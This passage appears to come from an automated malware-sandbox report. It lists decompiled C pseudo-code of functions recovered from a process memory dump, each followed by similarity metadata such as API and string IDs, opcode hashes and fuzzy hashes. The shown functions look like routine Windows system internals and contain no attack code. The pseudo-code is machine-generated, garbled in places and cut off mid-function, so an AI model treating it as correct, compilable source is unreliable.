                                                                        						_t88 = E0155500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                                                        						_t119 = _t119 + 0x1c;
                                                                        						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                                                        						if(_t88 < 0) {
                                                                        							goto L29;
                                                                        						}
                                                                        						_t101 = _t118 - 0x3c;
                                                                        						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                                                        						goto L21;
                                                                        					}
                                                                        					_t67 = 0xc0000017;
                                                                        					goto L28;
                                                                        				}
                                                                        				_push(0);
                                                                        				_push(0x20);
                                                                        				_push(_t118 - 0x60);
                                                                        				_push(0x5a);
                                                                        				_t94 = E01519860();
                                                                        				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                                                        				if(_t94 < 0) {
                                                                        					goto L29;
                                                                        				}
                                                                        				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                                                        					_t101 = L"Legacy";
                                                                        					_push(6);
                                                                        				} else {
                                                                        					_t101 = L"UEFI";
                                                                        					_push(4);
                                                                        				}
                                                                        				_pop(_t65);
                                                                        				goto L21;
                                                                        			}























                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: Legacy$UEFI
                                                                        • API String ID: 2994545307-634100481
                                                                        • Opcode ID: ef30659ee5ee88ba8f3e94f97cf1fc51052b4d38fab278472f96bd9a9e03519f
                                                                        • Instruction ID: 3d023af478b1314f81d10162a3dd89613cc8c4e6c0a5b3d9415eef282ed44ed2
                                                                        • Opcode Fuzzy Hash: ef30659ee5ee88ba8f3e94f97cf1fc51052b4d38fab278472f96bd9a9e03519f
                                                                        • Instruction Fuzzy Hash: C5517F71E106099FDB65DFA8C890AADBBF4FF48740F15442EEA49EF252E6709940CB10
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 76%
                                                                        			E014FB944(signed int* __ecx, char __edx) {
                                                                        				signed int _v8;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				char _v28;
                                                                        				signed int _v32;
                                                                        				char _v36;
                                                                        				signed int _v40;
                                                                        				intOrPtr _v44;
                                                                        				signed int* _v48;
                                                                        				signed int _v52;
                                                                        				signed int _v56;
                                                                        				intOrPtr _v60;
                                                                        				intOrPtr _v64;
                                                                        				intOrPtr _v68;
                                                                        				intOrPtr _v72;
                                                                        				intOrPtr _v76;
                                                                        				char _v77;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				intOrPtr* _t65;
                                                                        				intOrPtr _t67;
                                                                        				intOrPtr _t68;
                                                                        				char* _t73;
                                                                        				intOrPtr _t77;
                                                                        				intOrPtr _t78;
                                                                        				signed int _t82;
                                                                        				intOrPtr _t83;
                                                                        				void* _t87;
                                                                        				char _t88;
                                                                        				intOrPtr* _t89;
                                                                        				intOrPtr _t91;
                                                                        				void* _t97;
                                                                        				intOrPtr _t100;
                                                                        				void* _t102;
                                                                        				void* _t107;
                                                                        				signed int _t108;
                                                                        				intOrPtr* _t112;
                                                                        				void* _t113;
                                                                        				intOrPtr* _t114;
                                                                        				intOrPtr _t115;
                                                                        				intOrPtr _t116;
                                                                        				intOrPtr _t117;
                                                                        				signed int _t118;
                                                                        				void* _t130;
                                                                        
                                                                        				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                                                        				_v8 =  *0x15cd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                                                        				_t112 = __ecx;
                                                                        				_v77 = __edx;
                                                                        				_v48 = __ecx;
                                                                        				_v28 = 0;
                                                                        				_t5 = _t112 + 0xc; // 0x575651ff
                                                                        				_t105 =  *_t5;
                                                                        				_v20 = 0;
                                                                        				_v16 = 0;
                                                                        				if(_t105 == 0) {
                                                                        					_t50 = _t112 + 4; // 0x5de58b5b
                                                                        					_t60 =  *__ecx |  *_t50;
                                                                        					if(( *__ecx |  *_t50) != 0) {
                                                                        						 *__ecx = 0;
                                                                        						__ecx[1] = 0;
                                                                        						if(E014F7D50() != 0) {
                                                                        							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                        						} else {
                                                                        							_t65 = 0x7ffe0386;
                                                                        						}
                                                                        						if( *_t65 != 0) {
                                                                        							E015A8CD6(_t112);
                                                                        						}
                                                                        						_push(0);
                                                                        						_t52 = _t112 + 0x10; // 0x778df98b
                                                                        						_push( *_t52);
                                                                        						_t60 = E01519E20();
                                                                        					}
                                                                        					L20:
                                                                        					_pop(_t107);
                                                                        					_pop(_t113);
                                                                        					_pop(_t87);
                                                                        					return E0151B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                                                        				}
                                                                        				_t8 = _t112 + 8; // 0x8b000cc2
                                                                        				_t67 =  *_t8;
                                                                        				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                                                        				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                                                        				_t108 =  *(_t67 + 0x14);
                                                                        				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                                                        				_t105 = 0x2710;
                                                                        				asm("sbb eax, edi");
                                                                        				_v44 = _t88;
                                                                        				_v52 = _t108;
                                                                        				_t60 = E0151CE00(_t97, _t68, 0x2710, 0);
                                                                        				_v56 = _t60;
                                                                        				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                                                        					L3:
                                                                        					 *(_t112 + 0x44) = _t60;
                                                                        					_t105 = _t60 * 0x2710 >> 0x20;
                                                                        					 *_t112 = _t88;
                                                                        					 *(_t112 + 4) = _t108;
                                                                        					_v20 = _t60 * 0x2710;
                                                                        					_v16 = _t60 * 0x2710 >> 0x20;
                                                                        					if(_v77 != 0) {
                                                                        						L16:
                                                                        						_v36 = _t88;
                                                                        						_v32 = _t108;
                                                                        						if(E014F7D50() != 0) {
                                                                        							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                        						} else {
                                                                        							_t73 = 0x7ffe0386;
                                                                        						}
                                                                        						if( *_t73 != 0) {
                                                                        							_t105 = _v40;
                                                                        							E015A8F6A(_t112, _v40, _t88, _t108);
                                                                        						}
                                                                        						_push( &_v28);
                                                                        						_push(0);
                                                                        						_push( &_v36);
                                                                        						_t48 = _t112 + 0x10; // 0x778df98b
                                                                        						_push( *_t48);
                                                                        						_t60 = E0151AF60();
                                                                        						goto L20;
                                                                        					} else {
                                                                        						_t89 = 0x7ffe03b0;
                                                                        						do {
                                                                        							_t114 = 0x7ffe0010;
                                                                        							do {
                                                                        								_t77 =  *0x15c8628; // 0x0
                                                                        								_v68 = _t77;
                                                                        								_t78 =  *0x15c862c; // 0x0
                                                                        								_v64 = _t78;
                                                                        								_v72 =  *_t89;
                                                                        								_v76 =  *((intOrPtr*)(_t89 + 4));
                                                                        								while(1) {
                                                                        									_t105 =  *0x7ffe000c;
                                                                        									_t100 =  *0x7ffe0008;
                                                                        									if(_t105 ==  *_t114) {
                                                                        										goto L8;
                                                                        									}
                                                                        									asm("pause");
                                                                        								}
                                                                        								L8:
                                                                        								_t89 = 0x7ffe03b0;
                                                                        								_t115 =  *0x7ffe03b0;
                                                                        								_t82 =  *0x7FFE03B4;
                                                                        								_v60 = _t115;
                                                                        								_t114 = 0x7ffe0010;
                                                                        								_v56 = _t82;
                                                                        							} while (_v72 != _t115 || _v76 != _t82);
                                                                        							_t83 =  *0x15c8628; // 0x0
                                                                        							_t116 =  *0x15c862c; // 0x0
                                                                        							_v76 = _t116;
                                                                        							_t117 = _v68;
                                                                        						} while (_t117 != _t83 || _v64 != _v76);
                                                                        						asm("sbb edx, [esp+0x24]");
                                                                        						_t102 = _t100 - _v60 - _t117;
                                                                        						_t112 = _v48;
                                                                        						_t91 = _v44;
                                                                        						asm("sbb edx, eax");
                                                                        						_t130 = _t105 - _v52;
                                                                        						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                                                        							_t88 = _t102 - _t91;
                                                                        							asm("sbb edx, edi");
                                                                        							_t108 = _t105;
                                                                        						} else {
                                                                        							_t88 = 0;
                                                                        							_t108 = 0;
                                                                        						}
                                                                        						goto L16;
                                                                        					}
                                                                        				} else {
                                                                        					if( *(_t112 + 0x44) == _t60) {
                                                                        						goto L20;
                                                                        					}
                                                                        					goto L3;
                                                                        				}
                                                                        			}


                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014FB9A5
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID:
                                                                        • API String ID: 885266447-0
                                                                        • Opcode ID: 807acfe2e5e9f958e44f0fc0dbc599bff4d993b2f5e617727798964175f00f37
                                                                        • Instruction ID: 37593465320ceff35a141676457a82decc94bcb97cf288692797a7f68c6b5c04
                                                                        • Opcode Fuzzy Hash: 807acfe2e5e9f958e44f0fc0dbc599bff4d993b2f5e617727798964175f00f37
                                                                        • Instruction Fuzzy Hash: B2516671A08741CFC721CF29C48092BBBF5FB89600F15896EFA958B365D730E848CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 78%
                                                                        			E014DB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                                                        				signed int _t65;
                                                                        				signed short _t69;
                                                                        				intOrPtr _t70;
                                                                        				signed short _t85;
                                                                        				void* _t86;
                                                                        				signed short _t89;
                                                                        				signed short _t91;
                                                                        				intOrPtr _t92;
                                                                        				intOrPtr _t97;
                                                                        				intOrPtr* _t98;
                                                                        				signed short _t99;
                                                                        				signed short _t101;
                                                                        				void* _t102;
                                                                        				char* _t103;
                                                                        				signed short _t104;
                                                                        				intOrPtr* _t110;
                                                                        				void* _t111;
                                                                        				void* _t114;
                                                                        				intOrPtr* _t115;
                                                                        
                                                                        				_t109 = __esi;
                                                                        				_t108 = __edi;
                                                                        				_t106 = __edx;
                                                                        				_t95 = __ebx;
                                                                        				_push(0x90);
                                                                        				_push(0x15af7a8);
                                                                        				E0152D0E8(__ebx, __edi, __esi);
                                                                        				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                                                        				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                                                        				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                                                        				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                                                        				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                                                        				if(__edx == 0xffffffff) {
                                                                        					L6:
                                                                        					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                                                        					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                                                        					__eflags = _t65 & 0x00000002;
                                                                        					if((_t65 & 0x00000002) != 0) {
                                                                        						L3:
                                                                        						L4:
                                                                        						return E0152D130(_t95, _t108, _t109);
                                                                        					}
                                                                        					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                                                        					_t108 = 0;
                                                                        					_t109 = 0;
                                                                        					_t95 = 0;
                                                                        					__eflags = 0;
                                                                        					while(1) {
                                                                        						__eflags = _t95 - 0x200;
                                                                        						if(_t95 >= 0x200) {
                                                                        							break;
                                                                        						}
                                                                        						E0151D000(0x80);
                                                                        						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                                                        						_t108 = _t115;
                                                                        						_t95 = _t95 - 0xffffff80;
                                                                        						_t17 = _t114 - 4;
                                                                        						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                                                        						__eflags =  *_t17;
                                                                        						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                                                        						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                                                        						_t102 = _t110 + 1;
                                                                        						do {
                                                                        							_t85 =  *_t110;
                                                                        							_t110 = _t110 + 1;
                                                                        							__eflags = _t85;
                                                                        						} while (_t85 != 0);
                                                                        						_t111 = _t110 - _t102;
                                                                        						_t21 = _t95 - 1; // -129
                                                                        						_t86 = _t21;
                                                                        						__eflags = _t111 - _t86;
                                                                        						if(_t111 > _t86) {
                                                                        							_t111 = _t86;
                                                                        						}
                                                                        						E0151F3E0(_t108, _t106, _t111);
                                                                        						_t115 = _t115 + 0xc;
                                                                        						_t103 = _t111 + _t108;
                                                                        						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                                                        						_t89 = _t95 - _t111;
                                                                        						__eflags = _t89;
                                                                        						_push(0);
                                                                        						if(_t89 == 0) {
                                                                        							L15:
                                                                        							_t109 = 0xc000000d;
                                                                        							goto L16;
                                                                        						} else {
                                                                        							__eflags = _t89 - 0x7fffffff;
                                                                        							if(_t89 <= 0x7fffffff) {
                                                                        								L16:
                                                                        								 *(_t114 - 0x94) = _t109;
                                                                        								__eflags = _t109;
                                                                        								if(_t109 < 0) {
                                                                        									__eflags = _t89;
                                                                        									if(_t89 != 0) {
                                                                        										 *_t103 = 0;
                                                                        									}
                                                                        									L26:
                                                                        									 *(_t114 - 0xa0) = _t109;
                                                                        									 *(_t114 - 4) = 0xfffffffe;
                                                                        									__eflags = _t109;
                                                                        									if(_t109 >= 0) {
                                                                        										L31:
                                                                        										_t98 = _t108;
                                                                        										_t39 = _t98 + 1; // 0x1
                                                                        										_t106 = _t39;
                                                                        										do {
                                                                        											_t69 =  *_t98;
                                                                        											_t98 = _t98 + 1;
                                                                        											__eflags = _t69;
                                                                        										} while (_t69 != 0);
                                                                        										_t99 = _t98 - _t106;
                                                                        										__eflags = _t99;
                                                                        										L34:
                                                                        										_t70 =  *[fs:0x30];
                                                                        										__eflags =  *((char*)(_t70 + 2));
                                                                        										if( *((char*)(_t70 + 2)) != 0) {
                                                                        											L40:
                                                                        											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                                                        											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                                                        											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                                                        											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                                                        											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                                                        											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                                                        											 *(_t114 - 4) = 1;
                                                                        											_push(_t114 - 0x74);
                                                                        											L0152DEF0(_t99, _t106);
                                                                        											 *(_t114 - 4) = 0xfffffffe;
                                                                        											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                        											goto L3;
                                                                        										}
                                                                        										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                                                        										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                                                        											goto L40;
                                                                        										}
                                                                        										_push( *((intOrPtr*)(_t114 + 8)));
                                                                        										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                                                        										_push(_t99 & 0x0000ffff);
                                                                        										_push(_t108);
                                                                        										_push(1);
                                                                        										_t101 = E0151B280();
                                                                        										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                                                        										if( *((char*)(_t114 + 0x14)) == 1) {
                                                                        											__eflags = _t101 - 0x80000003;
                                                                        											if(_t101 == 0x80000003) {
                                                                        												E0151B7E0(1);
                                                                        												_t101 = 0;
                                                                        												__eflags = 0;
                                                                        											}
                                                                        										}
                                                                        										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                        										goto L4;
                                                                        									}
                                                                        									__eflags = _t109 - 0x80000005;
                                                                        									if(_t109 == 0x80000005) {
                                                                        										continue;
                                                                        									}
                                                                        									break;
                                                                        								}
                                                                        								 *(_t114 - 0x90) = 0;
                                                                        								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                                                        								_t91 = E0151E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                                                        								_t115 = _t115 + 0x10;
                                                                        								_t104 = _t91;
                                                                        								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                                                        								__eflags = _t104;
                                                                        								if(_t104 < 0) {
                                                                        									L21:
                                                                        									_t109 = 0x80000005;
                                                                        									 *(_t114 - 0x90) = 0x80000005;
                                                                        									L22:
                                                                        									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                                                        									L23:
                                                                        									 *(_t114 - 0x94) = _t109;
                                                                        									goto L26;
                                                                        								}
                                                                        								__eflags = _t104 - _t92;
                                                                        								if(__eflags > 0) {
                                                                        									goto L21;
                                                                        								}
                                                                        								if(__eflags == 0) {
                                                                        									goto L22;
                                                                        								}
                                                                        								goto L23;
                                                                        							}
                                                                        							goto L15;
                                                                        						}
                                                                        					}
                                                                        					__eflags = _t109;
                                                                        					if(_t109 >= 0) {
                                                                        						goto L31;
                                                                        					}
                                                                        					__eflags = _t109 - 0x80000005;
                                                                        					if(_t109 != 0x80000005) {
                                                                        						goto L31;
                                                                        					}
                                                                        					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                                                        					_t38 = _t95 - 1; // -129
                                                                        					_t99 = _t38;
                                                                        					goto L34;
                                                                        				}
                                                                        				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                        					__eflags = __edx - 0x65;
                                                                        					if(__edx != 0x65) {
                                                                        						goto L2;
                                                                        					}
                                                                        					goto L6;
                                                                        				}
                                                                        				L2:
                                                                        				_push( *((intOrPtr*)(_t114 + 8)));
                                                                        				_push(_t106);
                                                                        				if(E0151A890() != 0) {
                                                                        					goto L6;
                                                                        				}
                                                                        				goto L3;
                                                                        			}























                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: _vswprintf_s
                                                                        • String ID:
                                                                        • API String ID: 677850445-0
                                                                        • Opcode ID: d5f0c9f6ed77d0ef20f932a78e8a0f239f0f1118b7ae48b07dbdfa73a1484108
                                                                        • Instruction ID: 78b6519e53094ae8d7552509c089b5a4d1b822d7cd5b0904a00f51f2cd188c02
                                                                        • Opcode Fuzzy Hash: d5f0c9f6ed77d0ef20f932a78e8a0f239f0f1118b7ae48b07dbdfa73a1484108
                                                                        • Instruction Fuzzy Hash: B451D072D0025A8EEF32CF68C844BAEBBB0FF85710F1041ADD859AF292D7744985CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E01502581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1530200396, char _a1546912076) {
                                                                        				signed int _v8;
                                                                        				signed int _v16;
                                                                        				unsigned int _v24;
                                                                        				void* _v28;
                                                                        				signed int _v32;
                                                                        				unsigned int _v36;
                                                                        				signed int _v37;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				signed int _v48;
                                                                        				signed int _v52;
                                                                        				signed int _v56;
                                                                        				intOrPtr _v60;
                                                                        				signed int _v64;
                                                                        				signed int _v68;
                                                                        				signed int _v72;
                                                                        				signed int _v76;
                                                                        				signed int _v80;
                                                                        				signed int _t243;
                                                                        				signed int _t247;
                                                                        				char* _t248;
                                                                        				signed int _t252;
                                                                        				signed int _t254;
                                                                        				intOrPtr _t256;
                                                                        				signed int _t259;
                                                                        				signed int _t266;
                                                                        				signed int _t269;
                                                                        				signed int _t277;
                                                                        				intOrPtr _t283;
                                                                        				signed int _t285;
                                                                        				signed int _t287;
                                                                        				void* _t288;
                                                                        				void* _t289;
                                                                        				signed int _t290;
                                                                        				unsigned int _t293;
                                                                        				signed int _t297;
                                                                        				void* _t298;
                                                                        				signed int _t299;
                                                                        				signed int _t303;
                                                                        				intOrPtr _t315;
                                                                        				signed int _t324;
                                                                        				signed int _t326;
                                                                        				signed int _t327;
                                                                        				signed int _t331;
                                                                        				signed int _t332;
                                                                        				intOrPtr* _t334;
                                                                        				signed int _t336;
                                                                        				signed int _t338;
                                                                        				signed int _t341;
                                                                        				void* _t342;
                                                                        				void* _t344;
                                                                        
                                                                        				_t338 = _t341;
                                                                        				_t342 = _t341 - 0x4c;
                                                                        				_v8 =  *0x15cd360 ^ _t338;
                                                                        				_push(__ebx);
                                                                        				_push(__esi);
                                                                        				_push(__edi);
                                                                        				_t331 = 0x15cb2e8;
                                                                        				_v56 = _a4;
                                                                        				_v48 = __edx;
                                                                        				_v60 = __ecx;
                                                                        				_t293 = 0;
                                                                        				_v80 = 0;
                                                                        				asm("movsd");
                                                                        				_v64 = 0;
                                                                        				_v76 = 0;
                                                                        				_v72 = 0;
                                                                        				asm("movsd");
                                                                        				_v44 = 0;
                                                                        				_v52 = 0;
                                                                        				_v68 = 0;
                                                                        				asm("movsd");
                                                                        				_v32 = 0;
                                                                        				_v36 = 0;
                                                                        				asm("movsd");
                                                                        				_v16 = 0;
                                                                        				_t283 = 0x48;
                                                                        				_t313 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                                                                        				_t324 = 0;
                                                                        				_v37 = _t313;
                                                                        				if(_v48 <= 0) {
                                                                        					L16:
                                                                        					_t45 = _t283 - 0x48; // 0x0
                                                                        					__eflags = _t45 - 0xfffe;
                                                                        					if(_t45 > 0xfffe) {
                                                                        						_t332 = 0xc0000106;
                                                                        						goto L32;
                                                                        					} else {
                                                                        						_t331 = L014F4620(_t293,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t283);
                                                                        						_v52 = _t331;
                                                                        						__eflags = _t331;
                                                                        						if(_t331 == 0) {
                                                                        							_t332 = 0xc0000017;
                                                                        							goto L32;
                                                                        						} else {
                                                                        							 *(_t331 + 0x44) =  *(_t331 + 0x44) & 0x00000000;
                                                                        							_t50 = _t331 + 0x48; // 0x48
                                                                        							_t326 = _t50;
                                                                        							_t313 = _v32;
                                                                        							 *((intOrPtr*)(_t331 + 0x3c)) = _t283;
                                                                        							_t285 = 0;
                                                                        							 *((short*)(_t331 + 0x30)) = _v48;
                                                                        							__eflags = _t313;
                                                                        							if(_t313 != 0) {
                                                                        								 *(_t331 + 0x18) = _t326;
                                                                        								__eflags = _t313 - 0x15c8478;
                                                                        								 *_t331 = ((0 | _t313 == 0x015c8478) - 0x00000001 & 0xfffffffb) + 7;
                                                                        								E0151F3E0(_t326,  *((intOrPtr*)(_t313 + 4)),  *_t313 & 0x0000ffff);
                                                                        								_t313 = _v32;
                                                                        								_t342 = _t342 + 0xc;
                                                                        								_t285 = 1;
                                                                        								__eflags = _a8;
                                                                        								_t326 = _t326 + (( *_t313 & 0x0000ffff) >> 1) * 2;
                                                                        								if(_a8 != 0) {
                                                                        									_t277 = E015639F2(_t326);
                                                                        									_t313 = _v32;
                                                                        									_t326 = _t277;
                                                                        								}
                                                                        							}
                                                                        							_t297 = 0;
                                                                        							_v16 = 0;
                                                                        							__eflags = _v48;
                                                                        							if(_v48 <= 0) {
                                                                        								L31:
                                                                        								_t332 = _v68;
                                                                        								__eflags = 0;
                                                                        								 *((short*)(_t326 - 2)) = 0;
                                                                        								goto L32;
                                                                        							} else {
                                                                        								_t287 = _t331 + _t285 * 4;
                                                                        								_v56 = _t287;
                                                                        								do {
                                                                        									__eflags = _t313;
                                                                        									if(_t313 != 0) {
                                                                        										_t243 =  *(_v60 + _t297 * 4);
                                                                        										__eflags = _t243;
                                                                        										if(_t243 == 0) {
                                                                        											goto L30;
                                                                        										} else {
                                                                        											__eflags = _t243 == 5;
                                                                        											if(_t243 == 5) {
                                                                        												goto L30;
                                                                        											} else {
                                                                        												goto L22;
                                                                        											}
                                                                        										}
                                                                        									} else {
                                                                        										L22:
                                                                        										 *_t287 =  *(_v60 + _t297 * 4);
                                                                        										 *(_t287 + 0x18) = _t326;
                                                                        										_t247 =  *(_v60 + _t297 * 4);
                                                                        										__eflags = _t247 - 8;
                                                                        										if(_t247 > 8) {
                                                                        											goto L56;
                                                                        										} else {
                                                                        											switch( *((intOrPtr*)(_t247 * 4 +  &M01502959))) {
                                                                        												case 0:
                                                                        													__ax =  *0x15c8488;
                                                                        													__eflags = __ax;
                                                                        													if(__ax == 0) {
                                                                        														goto L29;
                                                                        													} else {
                                                                        														__ax & 0x0000ffff = E0151F3E0(__edi,  *0x15c848c, __ax & 0x0000ffff);
                                                                        														__eax =  *0x15c8488 & 0x0000ffff;
                                                                        														goto L26;
                                                                        													}
                                                                        													goto L108;
                                                                        												case 1:
                                                                        													L45:
                                                                        													E0151F3E0(_t326, _v80, _v64);
                                                                        													_t272 = _v64;
                                                                        													goto L26;
                                                                        												case 2:
                                                                        													 *0x15c8480 & 0x0000ffff = E0151F3E0(__edi,  *0x15c8484,  *0x15c8480 & 0x0000ffff);
                                                                        													__eax =  *0x15c8480 & 0x0000ffff;
                                                                        													__eax = ( *0x15c8480 & 0x0000ffff) >> 1;
                                                                        													__edi = __edi + __eax * 2;
                                                                        													goto L28;
                                                                        												case 3:
                                                                        													__eax = _v44;
                                                                        													__eflags = __eax;
                                                                        													if(__eax == 0) {
                                                                        														goto L29;
                                                                        													} else {
                                                                        														__esi = __eax + __eax;
                                                                        														__eax = E0151F3E0(__edi, _v72, __esi);
                                                                        														__edi = __edi + __esi;
                                                                        														__esi = _v52;
                                                                        														goto L27;
                                                                        													}
                                                                        													goto L108;
                                                                        												case 4:
                                                                        													_push(0x2e);
                                                                        													_pop(__eax);
                                                                        													 *(__esi + 0x44) = __edi;
                                                                        													 *__edi = __ax;
                                                                        													__edi = __edi + 4;
                                                                        													_push(0x3b);
                                                                        													_pop(__eax);
                                                                        													 *(__edi - 2) = __ax;
                                                                        													goto L29;
                                                                        												case 5:
                                                                        													__eflags = _v36;
                                                                        													if(_v36 == 0) {
                                                                        														goto L45;
                                                                        													} else {
                                                                        														E0151F3E0(_t326, _v76, _v36);
                                                                        														_t272 = _v36;
                                                                        													}
                                                                        													L26:
                                                                        													_t342 = _t342 + 0xc;
                                                                        													_t326 = _t326 + (_t272 >> 1) * 2 + 2;
                                                                        													__eflags = _t326;
                                                                        													L27:
                                                                        													_push(0x3b);
                                                                        													_pop(_t274);
                                                                        													 *((short*)(_t326 - 2)) = _t274;
                                                                        													goto L28;
                                                                        												case 6:
                                                                        													__ebx =  *0x15c575c;
                                                                        													__eflags = __ebx - 0x15c575c;
                                                                        													if(__ebx != 0x15c575c) {
                                                                        														_push(0x3b);
                                                                        														_pop(__esi);
                                                                        														do {
                                                                        															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                                                        															E0151F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                                                        															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                                                        															__edi = __edi + __eax * 2;
                                                                        															__edi = __edi + 2;
                                                                        															 *(__edi - 2) = __si;
                                                                        															__ebx =  *__ebx;
                                                                        															__eflags = __ebx - 0x15c575c;
                                                                        														} while (__ebx != 0x15c575c);
                                                                        														__esi = _v52;
                                                                        														__ecx = _v16;
                                                                        														__edx = _v32;
                                                                        													}
                                                                        													__ebx = _v56;
                                                                        													goto L29;
                                                                        												case 7:
                                                                        													 *0x15c8478 & 0x0000ffff = E0151F3E0(__edi,  *0x15c847c,  *0x15c8478 & 0x0000ffff);
                                                                        													__eax =  *0x15c8478 & 0x0000ffff;
                                                                        													__eax = ( *0x15c8478 & 0x0000ffff) >> 1;
                                                                        													__eflags = _a8;
                                                                        													__edi = __edi + __eax * 2;
                                                                        													if(_a8 != 0) {
                                                                        														__ecx = __edi;
                                                                        														__eax = E015639F2(__ecx);
                                                                        														__edi = __eax;
                                                                        													}
                                                                        													goto L28;
                                                                        												case 8:
                                                                        													__eax = 0;
                                                                        													 *(__edi - 2) = __ax;
                                                                        													 *0x15c6e58 & 0x0000ffff = E0151F3E0(__edi,  *0x15c6e5c,  *0x15c6e58 & 0x0000ffff);
                                                                        													 *(__esi + 0x38) = __edi;
                                                                        													__eax =  *0x15c6e58 & 0x0000ffff;
                                                                        													__eax = ( *0x15c6e58 & 0x0000ffff) >> 1;
                                                                        													__edi = __edi + __eax * 2;
                                                                        													__edi = __edi + 2;
                                                                        													L28:
                                                                        													_t297 = _v16;
                                                                        													_t313 = _v32;
                                                                        													L29:
                                                                        													_t287 = _t287 + 4;
                                                                        													__eflags = _t287;
                                                                        													_v56 = _t287;
                                                                        													goto L30;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        									goto L108;
                                                                        									L30:
                                                                        									_t297 = _t297 + 1;
                                                                        									_v16 = _t297;
                                                                        									__eflags = _t297 - _v48;
                                                                        								} while (_t297 < _v48);
                                                                        								goto L31;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					while(1) {
                                                                        						L1:
                                                                        						_t247 =  *(_v60 + _t324 * 4);
                                                                        						if(_t247 > 8) {
                                                                        							break;
                                                                        						}
                                                                        						switch( *((intOrPtr*)(_t247 * 4 +  &M01502935))) {
                                                                        							case 0:
                                                                        								__ax =  *0x15c8488;
                                                                        								__eflags = __ax;
                                                                        								if(__ax != 0) {
